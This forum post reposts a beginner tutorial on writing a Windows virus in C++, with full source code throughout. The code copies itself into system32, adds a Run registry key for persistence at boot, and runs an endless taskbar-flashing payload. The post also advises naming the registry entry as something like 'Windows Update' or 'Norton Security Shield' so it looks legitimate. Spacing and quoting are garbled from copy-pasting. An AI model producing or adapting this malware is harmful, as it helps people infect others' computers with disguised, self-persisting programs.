First: This is not my guide i found it while surfing the internet(probably some guy nam ed smith) and copy

pasted it. Also i just posted it here coz i think its a great beginner tut for writing viru ses in c++(and i mean writing virus not learning c++). Second: viruss means virus only just a fun way to write so plz do not tell me i got the spelling wrong. Win32 API Reference <- Not Required but very helpful A C++ Compiler I Recommend DEV for people who do not wish to buy and Microsoft V isual C++ 6.0 for people with money and serious programmers, however DEV works f ine. Even if you have never programmed before you should be able to carry along with this one, but it helps if you know a little bit of C++. Ok lets begin fire up DEV or (microsoft visual c++)and select new Win32 GUI for DEV users and Win32 for MSVC. Now with DEV it makes some generated code for GUI apps, delete it all leaving something like this: QUOTE #include <windows.h> int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil) { return 0; } Now compile and run the code nothing should happen (if a black window pops up it means you didnt goto win32) The reason nothing happened is because or program do esnt do anything. It runs and exits we need to make it do something first of all add this code to the project in between the { } and before return 0;. MessageBox(NULL,Hello,Messagebox Example,MB_OK); Now compile and run the program again A message box should pop up, cool ay? But its not much of a virus lets make it do some cool stuff. Add the following code to your project: QUOTE char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL); GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); GetSystemDirectory(system,sizeof(system)); strcat(system,\\virus.exe); CopyFile(pathtofile,system,false); MessageBox(NULL,Hello,Messagebox Example,MB_OK); Once again make sure the code is before return 0; and the { }.Ok compile and run the code, now open up the system32 directory in you windows folder (for those w ho dont know goto run in the startbar and type: %windir%\system32 Ok look for a file called virus.exe in the system32 folder. Dont believe me that

its our virus? Run the file it should come up with a message box saying Hello. Cool is it not? Ok time to explain how this works: char sytem[MAX_PATH]; This is the buffer to hold the system32 directory. char pathtofile[MAX_PATH]; This is the buffer to hold the path to our virus. HMODULE GetModH = GetModuleHandle(NULL); This one my be hard to grasp for some b ut bare with me. GetModH holds the handle to our virus GetModuleHandle() gets th e handle and stores it there. GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); This gets the FileName of our virus using the handle we got before and storing the path to it in patht ofile. GetSystemDirectory(system,sizeof(system)); Basically this finds out what your sy stem directory is. Remember not everyones windows directory is c:\windows\system32 . Mine is d:\winnt\system32 on this box, the reason for this is we want to copy to an existent system32 directory. strcat(system,\\virus.exe); Ok we have the system32 directory c:\windows\system32 or whatever now we need a place to copy to. This function binds to strings toget her to form one. So our system buffer now says: c:\windows\system32\virus.exe or whatever the case maybe. Note \\ is not a typo \\ is how c++ interprets \. A single \ is seen by c++ as an escape character and if you have one your virus will not work! CopyFile(pathtofile,system,false); Pretty self explanatory copy from were our vi rus is to were we want it to be. What false means if virus.exe already exists it will copy over it, to stop this change false to true (leave it as false for thi s tutorial). Ok thats it next we are going . We are going to use an 3 API RegOpenKeyEx(); This opens the RegSetValueEx(); This sets our RegCloseKey(); This closes the add code so it will startup when the computer boots calls to accomplish this key we want to write to value key

Time to add code to our fledgling virus: QUOTE HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,Software\\Microsoft\\Windows\\CurrentVersion\?\Ru n,0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, Writing to the Registry Example,0,REG_SZ,(const unsigned char* )system,sizeof(system)); RegCloseKey(hKey); Ok obviously this is going to need an more of an explanation than before. HKEY h Key is the buffer that holds the data for calls to the registry nothing else abo ut this except you need it. RegOpenKeyEx Opens the key HKEY_LOCAL_MACHINE\Softwa re\Microsoft\Windows\CurrentVersion\Run this is the key for starting up for all users which is what we want. 0 is reserved and needs to stay 0. We want to open up the key with set permissions thats why we use KEY_SET_VALUE. And then we add t he buffer. The next call: hKey is the buffer Writing to the registry example is the message t

o appear in the key you can change this to something less obviously like Windows Update or Norton Security Shield anyway be creative. The next zero is the same as a bove reserved needs to stay 0. REG_SZ is the type of key we want. There are othe r types like REG_BINARY and REG_DWORD but we are using REG_SZ which is for text. (const unsigned char*) formats our string to a const unsigned char * because it doesnt accept normal chars. system is the buffer that holds the path to our viru s and the final part is the size of the string, this is calculated automatically by using sizeof. The next call closes the registry key. Ok add this to you code so it looks something like: QUOTE #include <windows.h> int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil) { char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL); GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); GetSystemDirectory(system,sizeof(system)); strcat(system,\\virus.exe); CopyFile(pathtofile,system,false); HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,Software\\Microsoft\\Windows\\CurrentVersion\?\Ru n,0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, Writing to the Registry Example,0,REG_SZ,(const unsigned char* )system,sizeof(system)); RegCloseKey(hKey); return 0; } Now run you code and open up regedit and browse to HKEY_LOCAL_MACHINE\Software\M icrosoft\Windows\CurrentVersion\Run there should be a new key in the area to the right our key! Now comes the fun part of writing a virus the payload! This could be anywhere fr om a DdoS to making the cursor jump around the screen. Note destructive payloads are lame and frowned upon by the virus community, so do you self a favour and g et the idea of destroying computers out of your mind. Besides writing a non dest ructive payload is more fun. Lets go with a payload Ive written and christened Th e Flasher. Your code should now look like this with the payload attached: QUOTE #include <windows.h>

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil) { char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL); GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); GetSystemDirectory(system,sizeof(system)); strcat(system,\\virus.exe); CopyFile(pathtofile,system,false); HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,Software\\Microsoft\\Windows\\CurrentVersion\?\Ru n,0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, Writing to the Registry Example,0,REG_SZ,(const unsigned char* )system,sizeof(system)); RegCloseKey(hKey); HWND hWin; hWin = FindWindow(Shell_TrayWnd,NULL); EnableWindow(hWin,false); while(1==1) { ShowWindow(hWin,false); Sleep(1000); ShowWindow(hWin,true); Sleep(1000); } return 0; } Although small dont underestimate this payload it is very annoying try it. To fix your startbar ctrl-alt-delete find virus.exe end the process. Then find explore r.exe end it. Finally while still in task manager goto file run and type explorer .exe without the quotes. If that doesnt work change EnableWindow and ShowWindow to true instead of false, remember to change it back later though. Comments are still welcome, if u have any problem lemme know even though its not my code i ll be more than happy to explain things to you. -------------------------------------------------------------------------------:evilgrin: There are three types of people in the world: